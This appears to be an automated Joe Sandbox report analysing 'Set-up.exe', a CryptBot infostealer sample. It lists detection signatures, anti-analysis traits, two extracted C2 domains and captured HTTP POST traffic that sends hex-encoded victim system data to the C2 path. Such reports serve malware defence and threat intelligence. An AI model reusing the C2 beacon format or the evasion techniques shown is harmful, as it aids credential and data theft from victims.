Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Set-up.exe

Overview

General Information

Sample name:Set-up.exe
Analysis ID:1584736
MD5:82f12257874f42d2f2475ca1d9189e43
SHA1:24e0e7493e9bcc17d4858f350c6a6694f4a5acc5
SHA256:b75aaedf296ec3b596c58573077667f403ed73b18ec052ed9b68b21414671a72
Tags:CryptBotexeuser-aachum
Infos:

Detection

Cryptbot
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Cryptbot
C2 URLs / IPs found in malware configuration
Contain functionality to detect virtual machines
Infostealer behavior detected
Leaks process information
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
AV process strings found (often used to terminate AV products)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected potential crypto function
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • Set-up.exe (PID: 6512 cmdline: "C:\Users\user\Desktop\Set-up.exe" MD5: 82F12257874F42D2F2475CA1D9189E43)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CryptBotA typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot

Malware Configuration

Threatname: Cryptbot

{"C2 list": ["thirttj13vs.top", "home.thirttj13vs.top"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: Set-up.exe PID: 6512JoeSecurity_Cryptbot_1Yara detected CryptbotJoe Security

    Sigma Signatures

    No Sigma rule has matched

    Suricata Signatures

    No Suricata rule has matched

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Found malware configuration
    Source: Set-up.exe.6512.0.memstrminMalware Configuration Extractor: Cryptbot {"C2 list": ["thirttj13vs.top", "home.thirttj13vs.top"]}
    Multi AV Scanner detection for submitted file
    Source: Set-up.exeVirustotal: Detection: 33%Perma Link
    Source: Set-up.exeReversingLabs: Detection: 28%
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00498E90 Sleep,_open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext,0_2_00498E90
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00631870 GetVersion,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,GetLastError,__acrt_iob_func,_time32,GetLastError,__acrt_iob_func,0_2_00631870
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0034F6E0 wcscmp,CryptAcquireContextW,CryptGetUserKey,GetLastError,GetLastError,CryptReleaseContext,0_2_0034F6E0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00351B40 MultiByteToWideChar,MultiByteToWideChar,CryptAcquireContextW,CryptGetProvParam,CryptGetProvParam,CryptGetProvParam,GetLastError,GetLastError,CryptReleaseContext,GetLastError,CryptReleaseContext,0_2_00351B40
    Source: C:\Users\user\Desktop\Set-up.exeCode function: -----BEGIN PUBLIC KEY-----0_2_0013DCF0
    Source: Set-up.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
    Source: Set-up.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
    Source: Set-up.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0011255D GetSystemInfo,GetSystemInfo,GlobalMemoryStatusEx,GlobalMemoryStatusEx,GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetDriveTypeA,GetDriveTypeA,GetDiskFreeSpaceExA,GetDiskFreeSpaceExA,strlen,EnumDisplayMonitors,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,SHGetKnownFolderPath,wcscpy,wcscat,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,K32EnumProcesses,GetTickCount64,0_2_0011255D
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_001129FF FindFirstFileA,FindFirstFileA,RegOpenKeyExA,RegOpenKeyExA,GetModuleFileNameA,CharUpperA,CharUpperA,strstr,CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,Process32Next,OpenProcess,QueryFullProcessImageNameA,QueryFullProcessImageNameA,CharUpperA,CloseHandle,CloseHandle,strstr,CreateToolhelp32Snapshot,Process32First,strncpy,_strlwr_s,strstr,strstr,strstr,strstr,CloseHandle,Process32Next,CloseHandle,CloseHandle,EnumWindows,EnumWindows,GetTickCount64,0_2_001129FF
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_002EE270 _errno,FindNextFileW,WideCharToMultiByte,strlen,_errno,calloc,MultiByteToWideChar,MultiByteToWideChar,_errno,GetLastError,MultiByteToWideChar,wcscpy,FindFirstFileW,free,_errno,0_2_002EE270
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0011255D GetSystemInfo,GetSystemInfo,GlobalMemoryStatusEx,GlobalMemoryStatusEx,GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetDriveTypeA,GetDriveTypeA,GetDiskFreeSpaceExA,GetDiskFreeSpaceExA,strlen,EnumDisplayMonitors,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,SHGetKnownFolderPath,wcscpy,wcscat,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,K32EnumProcesses,GetTickCount64,0_2_0011255D

    Networking

    barindex
    C2 URLs / IPs found in malware configuration
    Source: Malware configuration extractorURLs: thirttj13vs.top
    Source: Malware configuration extractorURLs: home.thirttj13vs.top
    Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
    Source: global trafficHTTP traffic detected: POST /gbVspuhpvozlydclqfRi1736138767 HTTP/1.1Host: home.thirttj13vs.topAccept: */*Content-Type: application/jsonContent-Length: 577840Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 33 32 39 31 35 34 35 38 33 31 37 39 39 30 37 30 35 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c
    Source: global trafficHTTP traffic detected: GET /gbVspuhpvozlydclqfRi1736138767?argument=0 HTTP/1.1Host: home.thirttj13vs.topAccept: */*
    Source: global trafficHTTP traffic detected: POST /gbVspuhpvozlydclqfRi1736138767 HTTP/1.1Host: home.thirttj13vs.topAccept: */*Content-Type: application/jsonContent-Length: 31Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }
    Source: Joe Sandbox ViewIP Address: 34.147.147.173 34.147.147.173
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_001DA870 recv,0_2_001DA870
    Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
    Source: global trafficHTTP traffic detected: GET /gbVspuhpvozlydclqfRi1736138767?argument=0 HTTP/1.1Host: home.thirttj13vs.topAccept: */*
    Source: global trafficDNS traffic detected: DNS query: httpbin.org
    Source: global trafficDNS traffic detected: DNS query: home.thirttj13vs.top
    Source: unknownHTTP traffic detected: POST /gbVspuhpvozlydclqfRi1736138767 HTTP/1.1Host: home.thirttj13vs.topAccept: */*Content-Type: application/jsonContent-Length: 577840Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 33 32 39 31 35 34 35 38 33 31 37 39 39 30 37 30 35 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDserver: nginx/1.22.1date: Mon, 06 Jan 2025 11:15:06 GMTcontent-type: text/html; charset=utf-8content-length: 207Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDserver: nginx/1.22.1date: Mon, 06 Jan 2025 11:15:07 GMTcontent-type: text/html; charset=utf-8content-length: 207Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
    Source: Set-up.exeString found in binary or memory: http://.css
    Source: Set-up.exeString found in binary or memory: http://.jpg
    Source: Set-up.exe, Set-up.exe, 00000000.00000003.1766598511.0000000001593000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1766768289.0000000001597000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1766658323.0000000001596000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmp, Set-up.exe, 00000000.00000002.1768202774.000000000159B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.thirttj13vs.top/gbVspuhpvozlydclqfRi1736138767
    Source: Set-up.exe, 00000000.00000003.1766598511.0000000001593000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1766768289.0000000001597000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1766658323.0000000001596000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1768202774.000000000159B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.thirttj13vs.top/gbVspuhpvozlydclqfRi17361387675a1
    Source: Set-up.exe, 00000000.00000003.1766598511.0000000001593000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1766768289.0000000001597000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1766658323.0000000001596000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1768202774.000000000159B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.thirttj13vs.top/gbVspuhpvozlydclqfRi1736138767963
    Source: Set-up.exe, 00000000.00000002.1768202774.000000000159B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.thirttj13vs.top/gbVspuhpvozlydclqfRi1736138767?argu
    Source: Set-up.exe, 00000000.00000003.1739526627.00000000015C9000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1751160125.00000000015CB000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1768172601.0000000001591000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1751327184.00000000015CB000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1768247839.00000000015CB000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1751238014.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1751269153.00000000015C9000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1739584066.00000000015CB000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1766523089.00000000015CB000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1766598511.000000000158D000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1739497869.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1766788259.0000000001591000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1766966328.0000000001591000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.thirttj13vs.top/gbVspuhpvozlydclqfRi1736138767?argument=0
    Source: Set-up.exe, 00000000.00000002.1768172601.0000000001591000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1766598511.000000000158D000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1766788259.0000000001591000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1766966328.0000000001591000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.thirttj13vs.top/gbVspuhpvozlydclqfRi1736138767?argument=0S
    Source: Set-up.exe, 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.thirttj13vs.top/gbVspuhpvozlydclqfRi1736138767http://home.thirttj13vs.top/gbVspuhpvozlyd
    Source: Set-up.exeString found in binary or memory: http://home.thirttj13vs.top/gbVspuhpvozlydclqfRi67
    Source: Set-up.exeString found in binary or memory: http://html4/loose.dtd
    Source: Set-up.exeString found in binary or memory: http://timestamp.digicert.com0
    Source: Set-up.exeString found in binary or memory: https://curl.se/docs/alt-svc.html
    Source: Set-up.exeString found in binary or memory: https://curl.se/docs/alt-svc.html#
    Source: Set-up.exeString found in binary or memory: https://curl.se/docs/hsts.html
    Source: Set-up.exeString found in binary or memory: https://curl.se/docs/hsts.html#
    Source: Set-up.exeString found in binary or memory: https://curl.se/docs/http-cookies.html
    Source: Set-up.exeString found in binary or memory: https://httpbin.org/ip
    Source: Set-up.exeString found in binary or memory: https://httpbin.org/ipbefore
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_001205B00_2_001205B0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00126FA00_2_00126FA0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0041C0500_2_0041C050
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0049E0500_2_0049E050
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0049A0000_2_0049A000
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_001BE0700_2_001BE070
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_004600320_2_00460032
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_003000800_2_00300080
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_002800F00_2_002800F0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_001E00E00_2_001E00E0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0037E1380_2_0037E138
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_003A01700_2_003A0170
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_002841700_2_00284170
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0042C1A00_2_0042C1A0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_001762100_2_00176210
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_002A02000_2_002A0200
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_004862D00_2_004862D0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0046E2F00_2_0046E2F0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_003D42F00_2_003D42F0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_001862E00_2_001862E0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_001DC3200_2_001DC320
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_003003500_2_00300350
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_001DE3E00_2_001DE3E0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_002724300_2_00272430
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_004804600_2_00480460
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0047C4700_2_0047C470
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_001E04200_2_001E0420
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_004644100_2_00464410
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_003CE4500_2_003CE450
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_002324A00_2_002324A0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0015E4800_2_0015E480
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_004805600_2_00480560
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_004905900_2_00490590
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0037E5D00_2_0037E5D0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_004785A00_2_004785A0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0011E6200_2_0011E620
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0048A6100_2_0048A610
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_003D26E00_2_003D26E0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_002987300_2_00298730
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_001DC7700_2_001DC770
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_004767300_2_00476730
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_002FA7800_2_002FA780
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_004947800_2_00494780
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_003587D00_2_003587D0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0048A8000_2_0048A800
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_004648A00_2_004648A0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0048E9400_2_0048E940
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_004909400_2_00490940
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_001CC9000_2_001CC900
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_001249400_2_00124940
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0011A9600_2_0011A960
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_002849F00_2_002849F0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0047EA700_2_0047EA70
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00196AA00_2_00196AA0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_002E6AC00_2_002E6AC0
